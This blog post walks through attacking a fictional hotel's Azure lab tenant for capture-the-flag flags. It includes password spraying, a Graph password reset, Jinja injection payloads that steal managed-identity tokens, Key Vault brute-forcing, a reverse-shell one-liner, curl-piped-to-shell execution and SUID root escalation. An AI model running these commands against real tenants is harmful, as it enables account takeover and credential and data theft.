DMCXBLUE

Previously we’ve talked about banks and casinos the glossy fronts of industries built to drain us while pretending to offer safety or fortune.

The game is never fair, the house always wins.

But here’s another thought that’s been in the mind of people from the recent DEFCON:

What happened to hacker culture?

Once a raw, chaotic swarm of misfits tearing into systems just to prove we could, it now feels domesticated. Today, “hacker” has been folded into the corporate HR dictionary. Red Team, Penetration Tester, Reverse Engineer, Malware Analyst/Developers we’ve all been given neat titles, neat salaries.

The underground became LinkedIn.

Let’s rewind to February 1995. A hacker named Kevin Mitnick[1] is arrested after breaking into the digital guts of Novell, Sun Microsystems, and Motorola. Back then, “hacker” still meant something: a technical outlaw, a problem-solver so dangerous the feds had to make an example of him.

Years later, the same man ran his own cybersecurity firm “Mitnick Security” teaching companies how to protect themselves from people like his former self. He didn’t get taken down by the government in the end, but by something crueler pancreatic cancer, on July 16, 2023[2]. In his own words, “I wasn’t interested in selling the source code or doing anything with it. It was more about the challenge of getting it,” he said. “It really was about the trophy.”[3]

I’ve talked before on guides, tips and opsec. I’ve used a mix of open-source tools and a few private ones from my own vault. This time, no gatekeeping.

No redacted payloads or blurred out scripts. Just me, the terminal, and the bare reality of what’s possible. Because if I’m teaching you how to think like a hacker, I won’t be hiding the good knives.

In modern times we are going against the cyber mercenaries who shill for defense contractors, intel agencies, banks the ones who call this “protection” but in reality they just defend the digital oligarchy. They hoard tools behind clearance levels. I share them, because power hoarded is power abused.

The target on my map was “Tropicana Bay Hotels.” In today’s polished corporate world, you won’t see everything just chained to Active Directory anymore.

There’s a new boss on the block Entra[4] (formerly known as Azure). It’s Microsoft’s cloud-shaped mirror of Active Directory, where admins rebuild structures in a cloud environment. The whole thing runs on credentials and tokens with data of authority that is aware if you passed MFA, cleared conditional access and what scope you hold.

For Entra Enumeration we will work with AADInternals[5] a popular PowerShell repository that enumerates Entra information via endpoints that are both well documented and not.

—— Password Spraying to VM (Enumeration) ——

We’re diving in blind, so the first move is recon. There’s a solid write-up out there on enumerating Entra ID with nothing but outsider permissions[1] no creds, no users, no access. Pure ghost work. It’s the kind of trick that lets you test the waters and figure out if the domain is wired into Azure at all.

The next step is a user list without it, outsider enumeration hits a wall. That means emails, and the hunt starts in familiar hunting grounds: Google, LinkedIn or the Hunter.io add-on you can grab from the Firefox store. Both come with strings attached. LinkedIn blocks scraping unless you’re logged in with some burner account (Gmail, Yahoo, Proton pick your mask). Hunter.io keeps the best results locked unless you’re flashing a company email, though that hurdle isn’t a problem an Office Account sub tied to a throwaway NameCheap domain does the trick.

But here’s the silver lining: you don’t need a mountain of addresses. Just a handful will reveal the company’s email naming scheme. You can start filling in the blanks by scavenging user data from public profiles, social sites, leaks on Pastebin, or old breaches. Emails are the common method of Access, via Phishing (Device Code) or Password Spraying.

You can verify emails existence by using Invoke-AADIntUserEnumerationAsOutsider -UserName firstname.lastname@tropicanabayhotels.com -Method Normal

Verifying emails is crucial otherwise you’re just blasting ghosts and waving red flags for spam filters. Once we’ve locked down a list of real addresses, there are two classic forks in the road. Phishing which can be messy, infrastructure-heavy, requires a full stage setup. Or password spraying simple, blunt, and low-effort, though odds dip when the user list is small. Still, humans are predictably sloppy, and that’s leverage enough.

When it comes to building a wordlist, custom always beats generic. Forget plain dictionary dumps; what you want are battle-tested credentials passwords shaped by the bad habits of people. Think recycled keys, lazy mutations, and predictable patterns. If you’ve ever sat behind a HelpDesk console, you know the drill: CompanyName + Number. CompanyName + Year. Season + Year. These aren’t hypotheticals they’re the passwords that prop up corporate security theater.

The tool of choice here is MSOLSpray[2] the script is very useful by giving us information such as: If a user’s credentials are valid, if MFA is enabled on the account, if a tenant doesn’t exist, if a user doesn’t exist, if the account is locked, or if the account is disabled.

With credentials secured, the enumeration game levels up now we’re inside the tenant. PowerShell’s built-in modules give us plenty to work with, but this isn’t button-mashing; it demands precision. Azure tenants aren’t a single playground they’re fragmented into silos. Azure RBAC runs its domain, while Microsoft Graph governs another. Two castles, two sets of gates. Forget that, and you’ll waste time knocking on doors that never open.

Our simple command to login Connect-AzAcccount -AccountId alice.hill@tropicanabayhotels.com

Whenever I log in with a user, I like to hook into both Az and Microsoft Graph right out of the gate. Connecting to Graph is painless:

$Token = (Get-AzAccessToken -ResourceTypeName MSGraph).Token 
Connect-MgGraph -AccessToken ($Token | ConvertTo-SecureString -AsPlainText -Force)

First move after login? Always check who you’re operating as:

C:\> Get-AzADUser -SignedIn

Know your reach. From there, it’s time to verify what kind of access your user actually has. This command maps out all your role assignments including group inheritance and old legacy admin privileges:

C:\> Get-AzRoleAssignment -ObjectId (Get-AzADUser -SignedIn).Id -ExpandPrincipalGroups -IncludeClassicAdministrators

The output showed Alice had access to a Storage Explorer[3] a jackpot in the right context. These containers can be goldmines: source code, internal databases, sometimes entire websites. PowerShell gives you the raw data, sure, but there’s an even cleaner way to explore: Storage Explorer. Free, slick, and dead simple. If your user has access, it opens the door without needing to touch a terminal. Be aware this requires another login, another footprint another log in the SOC analysts data.

Open Connect Dialog  → Subscription → Azure Environment → Login - Success.

You’ll want to tweak the dropdown settings to “All blobs and blobs without current version.” By default, you’re only seeing the latest snapshot clean, sanitized, and possibly hiding useful history. But old versions, timestamps, and shadow data often slip through as snapshots. Don’t miss them. That’s where the forgotten stuff lives. Notice a file that has credentials

New credentials, same playbook: find the weakest link and pull. This time, the user had access to a Key Vault which is a lockbox full of secrets, API keys, and app credentials.

—— Password Spraying to VM (Pivot) ——

Key Vaults hold keys, secrets and other data but the real question is: keys or secrets to what, and more importantly, to who? With enough time in the trenches, you start recognizing patterns. These secrets usually follow a scheme that gives away their purpose often tied to applications, and sometimes you can even guess which ones.

Curiosity pays here. There’s a clean way to list custom apps which these keys or secrets are common to be linked with in and are registered in the tenant:

C:\> Get-AzADApplication

DisplayName       Id                                   AppId

-------------     --                                   -----
AzureRTSP         2467127f-f5b9-4ba5-80c8-dae107eb4bf4 585ed674-2e9b-457a-b60b-daeb8de5c0b1
Ubuntu AAD Login  4438dcbe-ea5c-48c6-8e00-c3f86a0c93bd 2f85825b-c1d9-4b33-bda8-31c12ba1c0a9
P2P Server        95ae23c5-2270-40f8-b41c-0bcb65fe9b3d 251fd1ea-9bec-452b-9626-2802e58d75ee

Three targets. Three potential footholds. I wrote a script[1] to spray credentials against these SPNs. Best part? No MFA. No account lockouts. So go wild, though if the passwords are long and random, brute-forcing becomes wishful thinking. Know your limits, and aim smart. I used this custom script to Spray Applications with a single password, it can also be a single client and multiple passwords so that’s that.

With a successful login now we have a new access pivot point to continue enumeration rinse and repeat, the SPN has User Administrator access now we can change any users password and gain access, while enumerating I encountered VMs on Azure, and one specific user had access to a Custom Role that allowed them to run commands.

C:\> Get-AzRoleDefinition | Where-Object { $_.IsCustom -eq $true }

Name             : VM Command Executor
Id               : b0c382f8-abb4-4b63-adf9-17fb21f26a7f
IsCustom         : True
Description      : Allows execution of commands on a Windows VM via runCommand
Actions          : {Microsoft.Compute/virtualMachines/runCommand/action}
NotActions       : {}
DataActions      : {}
NotDataActions   : {}
AssignableScopes : {/subscriptions/703c480d-85a8-4f99-81c6-99ddf40e38a3}
Condition        :
ConditionVersion :

[1] https://gist.github.com/dmcxblue/84ab35944ed2d2a0ee8fcaa603e348b3

—— Password Spraying to VM (Escalate) ——

With the right permissions granted to a Service Principal, Graph access shifts from passive observation to active control. In this case, I leveraged it to reset a user’s password. The result? Their account became directly accessible, allowing me to authenticate as them and inherit their access. It’s a reminder that a single misconfigured SPN can quietly bypass MFA, policy gates, and all the supposed safeguards of “enterprise security.”

$userId = "bob.smith@tropicanabayhotels.com"
$newPassword = "NewStrongP@ssw0rd!"
# Update Bob's password

Update-MgUser -UserId $userId -BodyParameter @{
    passwordProfile = @{
        password = $newPassword
        forceChangePasswordNextSignIn = $false

    }

}

Gaining access to the user’s credentials opened the door to full session control allowing direct login and command execution within VM Workstation. These virtual machines are often gold mines of operational data: user accounts, password hashes, cryptographic keys, file systems, and web configs. What you’ll find depends on how the VMs are used, but at this point, it’s not about access it’s about extraction. From here, it’s a matter of digging where the gold is.

The way to achieve execution with proper permissions and a nice one-liner to filter out the rest of the messages and only grab the interesting output where bob left something interesting:

$result = Invoke-AzVMRunCommand -ResourceGroupName TBH-ENGINEERING -VMName TBH-VM -CommandId "RunPowerShellScript" -ScriptString "Get-Content -Path C:\Users\Public\Desktop\flag.txt"; $output = ($result.Value | Where-Object { $_.Code -like "*StdOut*" }).Message; $output

FLAG{TBH_VM_C0MM4Nd_3xEcU7i0n}

—— Managed Identities (Enumeration) ——

At the core, identity in cloud systems splits into two camps: human and non-human (machine) identities. Ironically, it’s another all-too-human slip that cracks the door open to the application layer. In theory, secrets and access to resources should be automated because letting humans touch keys is considered a “security risk.” Yet here’s the catch: managed identities, those pristine non-human agents, don’t spring into existence by divine protocol they’re provisioned by fallible humans. So the system that claims to minimize risk still leans on the same weak link it pretends to replace.

During earlier recon, we uncovered a subdomain linked to a now defunct service. But deprecated doesn’t mean dead URLs often linger like forgotten infrastructure. So I built a Python script[1] that weaponizes that decay: it brute-forces combinations of the discovered subdomain with over 110 known Azure service URL patterns. Think “serviceName.azurewebsites.net” and similar structures that crop up when services are auto-provisioned. It’s fast, noisy and built on the premise that cloud hygiene is more marketing than practice.

C:\> python UrlPartialEnum.py --url tbhstorage865046
[+] Checking 110 URLs...
[+] https://tbhstorage865046.z22.web.core.windows.net --> HTTP 200

We’ve grown so drunk on automation and Ai that we forgot how to look. I’ve seen too many so-called “hackers” bomb targets with Nmap, Metasploit, SQLMap which there is nothing wrong but the real signal sometimes gets lost in that noise. Sometimes, all it takes is patience. Load the site in a browser, watch what it asks from you. In this case, it straight up prompts the user for input a simple invitation to interaction. And with that, you get a peek behind the curtain: the tech stack reveals itself, often without firing a single payload.

Burp Suite remains a weapon of choice when dissecting web apps its ability to intercept, replay, and mutate traffic makes it ideal for mapping out both surface area and misconfigurations. By tweaking requests and eyeballing responses, you can start fingerprinting technologies in play and cross-referencing known CVEs tied to them. In this case, a simple POST request exposes something: the payload is handed off to a back-end function, and the response behavior screams Jinja templating.

[1] https://gist.github.com/dmcxblue/7b3ab9a9a8bcaa11cbf659880652922d

—— Managed Identities (Escalate) ——

That’s templating logic sitting server-side, likely unescaped. Through Burp[1], you’ll catch the endpoint likely an Azure Function handling the request. One weak regex or poorly sanitized input and you’re halfway to code execution.

Request:

POST /api/render HTTP/2
Host: render.azurewebsites.net
Content-Length: 15
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="139", "Not;A=Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Origin: https://tbhstorage865046.z22.web.core.windows.net
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://tbhstorage865046.z22.web.core.windows.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

payload={{7*7}}

Response:

HTTP/2 200 OK
Content-Type: text/html; charset=utf-8
Date: Sat, 08 Aug 2020 04:15:31 GMT
Server: Kestrel
Request-Context: appId=cid-v1:0cef3ea3-2032-4ffd-974a-18e45e3b6bc0

<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><title>Test Result</title></head>
<body>
  <h2>Submission:</h2>
  <pre>{{7*7}}</pre>
  <hr/>
  <h2>Result:</h2>
  <div>49</div>
</body>
</html>

We hit a Jinja[2] injection vulnerability classic case of unescaped input bleeding into server-side logic. That crack let us inject Python code directly, turning a template engine into a remote execution platform. From there, I chained together payloads targeting internal metadata endpoints to pull access tokens from multiple Azure resources: Graph, Management, and Key Vault. With those tokens in hand, enumeration becomes smooth. You’re not brute-forcing anymore you’re walking in with a keycard.

Azure Management Command:
{{ self.__init__.__globals__.__builtins__.__import__("os").popen("curl -s \"$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01\" -H \"Secret: $IDENTITY_HEADER\" 2>&1").read() }}

Microsoft Graph Command:
{{ self.__init__.__globals__.__builtins__.__import__("os").popen("curl -s \"$IDENTITY_ENDPOINT?resource=https://graph.microsoft.com&api-version=2017-09-01\" -H \"Secret: $IDENTITY_HEADER\" 2>&1").read() }}

Key Vault Command:
{{ self.__init__.__globals__.__builtins__.__import__("os").popen("curl -s \"$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2019-08-01\" -H \"X-IDENTITY-HEADER: $IDENTITY_HEADER\" 2>&1").read() }}

This kind of case doesn’t show up often, but it’s a byproduct of Azure’s sprawling, permission sliced architecture. The access model is fragmented roles, scopes, and token permissions don’t always line up cleanly. So critical resources can sit just out of view, not because they’re well hidden, but because a specific permission flag is missing. In our case, it was another Key Vault.

Here’s where things get interesting: with valid Microsoft Graph and Key Vault tokens in hand, you don’t need full enumeration. Azure resources often follow naming conventions (Humans). So we turn that into a strategy: brute-force Key Vault names based on predictable naming schemes, project, region. Utilizing KeyVaultBruteForce[3] No errors? You don’t have access. HTTP 403? You found something. 200? Jackpot.

C:\> python .\KeyVaultBrute.py --wordlist .\TBH\KeyVaultwordlist.txt --token $KToken

Azure KeyVault Brute Forcer v1.0

[+] ACCESS: TBHCurrencyVault (1 secrets)
[*] Done.

Keys

C:\> Get-AzKeyVaultSecret -VaultName TBHCurrencyVault

Vault Name   : tbhcurrencyvault
Name         : DB-password
Version      :
Id           : https://tbhcurrencyvault.vault.azure.net:443/secrets/DB-password
Enabled      : True
Expires      :
Not Before   :
Created      : 8/23/2025 1:24:31 AM
Updated      : 8/23/2025 1:24:31 AM
Content Type : application/json
Tags         : Name     Value
               format   json
               purpose  sql-cred


C:\> Get-AzKeyVaultSecret -VaultName TBHCurrencyVault -Name DB-password -AsPlainText
{"password":"gT7!pXq#8kJZ","username":"sqladmin"}

So besides having access to a KeyVault our Role Assignment has told us previously that we have access to an SQL Server with Access we can read the DBs with no issues after grabbing

Invoke-Sqlcmd -ServerInstance "financesqlsrvr001.database.windows.net" -Database "master" -Username "sqladmin" -Password "gT7!pXq#8kJZ" -Query "SELECT name FROM sys.databases"

name
----
master
UsersDB

Let’s pull more data from the DB

C:\> Invoke-Sqlcmd -ServerInstance "financesqlsrvr001.database.windows.net" -Database "UsersDB" -Username "sqladmin" -Password "gT7!pXq#8kJZ" -Query "SELECT * FROM INFORMATION_SCHEMA.TABLES"

TABLE_CATALOG TABLE_SCHEMA TABLE_NAME              TABLE_TYPE
------------- ------------ ----------              ----------
UsersDB       sys          database_firewall_rules VIEW
UsersDB       dbo          Users                   BASE TABLE

Now we can target the dbo table and grab data from the Users table

C:\> Invoke-Sqlcmd -ServerInstance "financesqlsrvr001.database.windows.net" -Database "UsersDB" -Username "sqladmin" -Password "gT7!pXq#8kJZ" -Query  "SELECT TOP 100 * FROM dbo.Users"

Id UPN                                  DisplayName   Password
-- ---                                  -----------   --------
 1 alice.hill@tropicanabayhotels.com    Alice Hill    Password123
 2 bob.smith@tropicanabayhotels.com     Bob Smith     SpR!ng2025_Cmplx
 3 carol.lee@tropicanabayhotels.com     Carol Lee     S!mm3r2025_Str0ng
 4 david.jones@tropicanabayhotels.com   David Jones   D@v1dJ0n35!
 5 erin.brown@tropicanabayhotels.com    Erin Brown    Br0wn3r!n2025
 6 frank.wright@tropicanabayhotels.com  Frank Wright  Wr1ght_F!22
 7 grace.chen@tropicanabayhotels.com    Grace Chen    Gr@c3Ch3n#1
 8 henry.kim@tropicanabayhotels.com     Henry Kim     H3nryK!m2025
 9 isabel.lopez@tropicanabayhotels.com  Isabel Lopez  L0p3z_Is@b3l
10 admin                                SuperSecret   FLAG{TBH_M4n4g3D_Id3nt17y}
11 ethan.winters@tropicanabayhotels.com Ethan Winters R053W!Nt3r5

—— RCE (Enumeration) ——

Finding more access points from our previous enumerations shows one last URL

tbh-xcugw2b4.westus.cloudapp.azure.com

Visiting the URL shows a directory listing files

We return to Burp and begin testing the PHP file. Such files often expose parameters tied to a functionality, and in some cases those functionalities can be misused or manipulated.

GET /info.php?param=id HTTP/1.1 ← The parameter we attack

Burp’s Intruder[1] goes to work, hammering a PHP parameter with a dictionary. Each response is a tells a shift in error text, a new status code, or a bump in length. They’re signals, leading straight to a weak spot. In this case it Command Execution, the server is hosted on a Linux Machine using Apache. And sending a single command id comes back as a response, now catching a shell[2] from the Linux Server is quite simple

ncat -e /usr/bin/bash <My Server> 80

# And upgrading the Shell to feel just like home
python -c 'import pty; pty.spawn("/bin/bash")'
# TEMR Values
export TERM=xterm

Enumerating Linux is quite another ball field when we have been tackling windows this entire time, but there are very well known resources that will allow us to compromise this Operating System, again looking for quick wins that will allow us to elevate our privileges to root a very popular tool it linpeas.sh[3] getting it onto the server is quite simple, this will download and execute the script

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

The script actually find something a SUID[4] vulnerability that will allow us to elevate our privileges from www-data to root searching the quick command from GTFOBins[5]

www-data@TBH-WebPage:/tmp$ find . -exec /bin/sh -p \; -quit
find . -exec /bin/sh -p \; -quit
# whoami
whoami
root
#

Now searching for interesting files a common location is usually the root folder, people think since root has high privileges no one can access them which should be true but oh boy

# ls -la
ls -la
total 24
drwx------  3 root root 4096 Aug 23 16:14 .
drwxr-xr-x 18 root root 4096 Aug 23 16:08 ..
-rw-r--r--  1 root root  571 Apr 10  2021 .bashrc
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
drwx------  2 root root 4096 Aug 23 16:08 .ssh
-rw-r--r--  1 root root  173 Aug 23 16:14 notes.txt
# cat notes.txt
cat notes.txt
Note:
        Please make sure we change Erins Password as he was in charge of the Applications
                Gracias canijo

User: erin.brown@tropicanabayhotels.com
Credentials: Br0wn3r!n2025

Cycle continues fresh credentials, fresh footholds, fresh opportunities. Even with MFA, EDR, and Network monitors in place, the cracks remain. Our new user seems to have access to a RunBook which their is a group for it as well

RoleAssignmentName : 5e215162-cf36-4248-a0f8-d3949a52d352
RoleAssignmentId   : /subscriptions/703c480d-85a8-4f99-81c6-99ddf40e38a3/providers/Microsoft.Authorization/roleAssignments/5e215162-cf36-4248-a0f8-d3949a52d352
Scope              : /subscriptions/703c480d-85a8-4f99-81c6-99ddf40e38a3
DisplayName        : TBH RunBook Staff
SignInName         :
RoleDefinitionName : Reader
RoleDefinitionId   : acdd72a7-3385-48ef-bd42-f606fba81ae7
ObjectId           : 28f59451-a02c-40be-972d-9b0f6c4fa681
ObjectType         : Group
CanDelegate        : False
Description        :
ConditionVersion   :
Condition          :

RoleAssignmentName : 518e7e85-6dae-4065-adab-6752341496b1
RoleAssignmentId   : /subscriptions/703c480d-85a8-4f99-81c6-99ddf40e38a3/resourceGroups/TBH-Engineering/providers/Microsoft.Automation/automationAccounts/BasicAuthFlag/runbooks/Send-Flag/providers/Microsoft.Authorization/roleAssignments/518e7e85-6dae-4065-adab-6752341496b1
Scope              : /subscriptions/703c480d-85a8-4f99-81c6-99ddf40e38a3/resourceGroups/TBH-Engineering/providers/Microsoft.Automation/automationAccounts/BasicAuthFlag/runbooks/Send-Flag
DisplayName        : TBH RunBook Staff
SignInName         :
RoleDefinitionName : Automation Runbook Operator
RoleDefinitionId   : 5fb5aef8-1081-4b8e-bb16-9d5d0385bab5
ObjectId           : 28f59451-a02c-40be-972d-9b0f6c4fa681
ObjectType         : Group
CanDelegate        : False
Description        :
ConditionVersion   :
Condition          :

Let’s grab the contents of the Runbook and the final flag

C:\> Get-AzAutomationAccount -ResourceGroupName TBH-Engineering | Format-List *

SubscriptionId        : 703c480d-85a8-4f99-81c6-99ddf40e38a3
ResourceGroupName     : TBH-Engineering
AutomationAccountName : BasicAuthFlag
Location              : westus
State                 : Ok
Plan                  :
CreationTime          : 8/23/2025 9:15:33 AM -07:00
LastModifiedTime      : 8/23/2025 9:15:33 AM -07:00
LastModifiedBy        :
Tags                  : {}
Identity              :
Encryption            :
PublicNetworkAccess   :

C:\> Get-AzAutomationRunbook -ResourceGroupName TBH-Engineering -AutomationAccountName BasicAuthFlag

Location              : westus
Tags                  : {}
JobCount              : 0
RunbookType           : PowerShell
Parameters            : {}
LogVerbose            : False
LogProgress           : False
LastModifiedBy        :
State                 : Published
ResourceGroupName     : TBH-Engineering
AutomationAccountName : BasicAuthFlag
Name                  : Send-Flag
CreationTime          : 8/23/2025 9:15:36 AM -07:00
LastModifiedTime      : 8/23/2025 9:15:43 AM -07:00
Description           :

C:\> Export-AzAutomationRunbook -Name Send-Flag -ResourceGroupName TBH-Engineering -AutomationAccountName BasicAuthFlag -OutputFolder $env:TEMP; Get-Content "$env:TEMP\Send-Flag.ps1" -ErrorAction SilentlyContinue

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
larhs          12/31/1600  4:00 PM
param(
    [Parameter(Mandatory=$true)][string]$ServerUrl,
    [Parameter(Mandatory=$true)][string]$Username,
    [Parameter(Mandatory=$true)][string]$Password
)

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

# Build Basic Auth header
$pair    = "{0}:{1}" -f $Username, $Password
$bytes   = [Text.Encoding]::ASCII.GetBytes($pair)
$token   = [Convert]::ToBase64String($bytes)
$headers = @{ Authorization = "Basic $token" }

# Hardcoded flag value (no randomness)
$flag = "Flag TBH{Run_F0r5T_RuNB0oK}"

# Send as JSON
$body = @{ message = $flag; sentAt = (Get-Date).ToUniversalTime().ToString("o") } | ConvertTo-Json

try {
    $resp = Invoke-RestMethod -Uri $ServerUrl -Method Post -Headers $headers -ContentType "application/json" -Body $body -TimeoutSec 30
    Write-Output "Sent: $flag"
    if ($resp) { Write-Output "Server response:"; $resp | Out-String }
}
catch {
    Write-Warning "Request failed: $($_.Exception.Message)"
}

Azure keeps growing and what I mapped here is only a fragment of its vast attack surface. Consider this a glimpse into the shifting terrain of hacking where change is the only constant. I have already shown you How To Rob the rest is for you to figure out 😉. Now go out there and Rob a Hotel!!

Legally…

P.S.: These blogs and How To are getting quite longer to build specially with the learning curve of understanding the technology behind them, these scenarios are built from the AzureStrike tool I’ve built for anyone trying to jump on the Azure Red Team space, based on trainings I tool myself. These little blogs I write them in hope’s that they will see them one day and look at my work.

To my family, my friends, my wife and daughter, and now to my son. I cannot wait to see you and let you in on a little Red Teaming. The game is bigger than us, but sharing it with you is what makes it real.

How to Rob a Hotel